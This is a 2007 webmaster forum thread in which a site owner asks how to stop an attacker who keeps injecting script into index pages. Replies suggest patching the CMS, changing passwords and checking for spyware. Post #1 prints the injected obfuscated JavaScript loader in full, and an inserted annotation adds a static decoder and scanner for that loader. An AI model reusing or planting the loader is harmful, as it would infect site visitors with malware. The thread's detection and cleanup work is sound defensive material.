Old 07-28-2007, 04:24 AM   #1
Vippy
Registered User
 
Join Date: Dec 2006
Posts: 5
Problem with server hacked, can anyone help?...

Hey guys

I'm hoping someone can help me here with a problem I am having on a couple of my member sites being hacked.

Someone is managing to hack into my FTP server and embedding a hidden remote file which is inserting malicious codes on my index page that contain viruses via external URLs. So anyone who reaches my index pages is hit with a trojan detection through their firewall!

The code which gets embedded is always at the bottom of the index source code and it looks like this:

<script language="JavaScript">e = '0x00' + '5F';str1 = "%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7%BE%B7%B4%B7%AC%A7%E6%B8%B7%BC%BC%BB%B2%FE%E2%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F1%F1%A9%BB%AC%AE%B7%BD%B2%AC%F2%B7%B2%BA%B1%F1%B4%BC%F1%AB%B0%B4%EF%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF%C0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%BB%E2%E4%F1%BC%B7%AA%E2";str=tmp='';for(i=0;i<str1.length;i+=3){tmp=unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

When I upload my local clean copy of the index page it was overwriting the infected file and he would pop up again with this code every 1 - 2 weeks.

The only further solution I have managed to find so far is to restrict FTP access from anywhere other than my local IP. Then we managed to detect this guy is in Russia and was accessing the remote file without using FTP and we banned all IPs from Russia! However I fear this is only a temporary solution as he can figure this out and spoof his IP address.

Anyone have any ideas what else I can do to keep this asshole away??
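Added example (not part of any post in this thread, and not the site owner's code): the loader in post #1 turns each %XX triplet into a character by XORing the byte with 0x5F and subtracting 127, so the markup it writes can be recovered statically instead of letting a browser run it; the first four triplets, %E4%BC%B7%AA, come out as "<div". The function names, the detection heuristic and the sample page with its placeholder URL are constructed for illustration.

```javascript
// Added example: static analysis only; the injected script is never executed.
const KEY = 0x5f;  // e = '0x00' + '5F' is coerced to 0x5F by the ^ operator
const BIAS = 127;  // the loader subtracts 127 after the XOR

// Decode a run of %XX triplets: char = (byte ^ KEY) - BIAS.
// Whitespace is dropped first, since pasted copies often pick up stray spaces.
function decodeBlob(blob) {
  const triplets = blob.replace(/\s+/g, '').match(/%[0-9A-Fa-f]{2}/g) || [];
  return triplets
    .map(t => String.fromCharCode((parseInt(t.slice(1), 16) ^ KEY) - BIAS))
    .join('');
}

// Inverse transform, used only to build the constructed sample below.
function encodeBlob(text) {
  return Array.from(text, c =>
    '%' + ((c.charCodeAt(0) + BIAS) ^ KEY).toString(16).toUpperCase().padStart(2, '0')
  ).join('');
}

// Report inline scripts that hold a long %XX string and pass it through
// unescape() and document.write(), together with the markup they would emit.
function scanHtml(html) {
  const findings = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const body = m[1];
    const blob = body.match(/"([%0-9A-Fa-f\s]{24,})"/);
    if (blob && /unescape\s*\(/.test(body) && /document\.write\s*\(/.test(body)) {
      findings.push({ offset: m.index, decoded: decodeBlob(blob[1]) });
    }
  }
  return findings;
}

// Constructed sample: a placeholder payload packed the same way as the real one.
const samplePayload =
  '<div style="visibility:hidden"><iframe src="http://placeholder.invalid/"></iframe></div>';
const samplePage =
  '<html><body><h1>Members</h1>\n<script language="JavaScript">e = \'0x00\' + \'5F\';str1 = "' +
  encodeBlob(samplePayload) +
  '";str = unescape(str1);document.write(str);</script></body></html>';

for (const f of scanHtml(samplePage)) {
  console.log(`script at offset ${f.offset} would write: ${f.decoded}`);
}
```

Feeding scanHtml the contents of each index page on a schedule flags a reinfection and shows what the injected script would load.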
Old 07-28-2007, 04:46 AM   #2
RaiDeN
Confirmed User
 
Join Date: May 2001
Location: Netherlands
Posts: 496
check this site

http://www.spybye.org/index.php?/categories/2-Malware
Old 07-28-2007, 04:49 AM   #3
mrwilson
mrwilson 2.0
 
Join Date: Jul 2007
Location: ICQ: 465406783
Posts: 5,122
What type of websites is it? Which CMS?
It's just an exploit in a CMS, make sure they are all updated?
Old 07-28-2007, 06:34 AM   #4
Lycanthrope
Confirmed User
 
Join Date: Jan 2004
Location: Wisconsin
Posts: 4,517
Did you change your FTP password?????
Old 07-28-2007, 06:53 AM   #5
Vlad
Confirmed User
 
Join Date: Dec 2002
Location: gone
Posts: 2,864
Quote:
Originally Posted by Lycanthrope View Post
Did you change your FTP password?????
Old 07-28-2007, 06:57 AM   #6
Lycanthrope
Confirmed User
 
Join Date: Jan 2004
Location: Wisconsin
Posts: 4,517
Quote:
Originally Posted by Vlad View Post
hehehe, I didn't mean to come off sounding like a smart ass. It was a serious question. I want to know if his NEW password was compromised as well.
Old 07-28-2007, 11:37 AM   #7
Vippy
Registered User
 
Join Date: Dec 2006
Posts: 5
Yep, we changed the FTP password also....
Old 07-28-2007, 11:42 AM   #8
Vippy
Registered User
 
Join Date: Dec 2006
Posts: 5
Thanks RaiDeN, I'm looking into SpyBye, do you use this yourself?


Regards
Old 07-28-2007, 11:52 AM   #9
RawAlex
So Fucking Banned
 
Join Date: Oct 2003
Location: In a house.
Posts: 9,465
Check your office and home PCs for spyware or toolbars.

Make a list of all commercial software you have on the server, and very closely check for any known exploits. Often it is something as stupid as an old WordPress install that can get you screwed up. Make sure all of your software (including version of PHP and such) are 100% up to date.

Have your hosting company check your install of apache to make sure that it hasn't been screwed with. That has become a more and more common hack as time has gone on.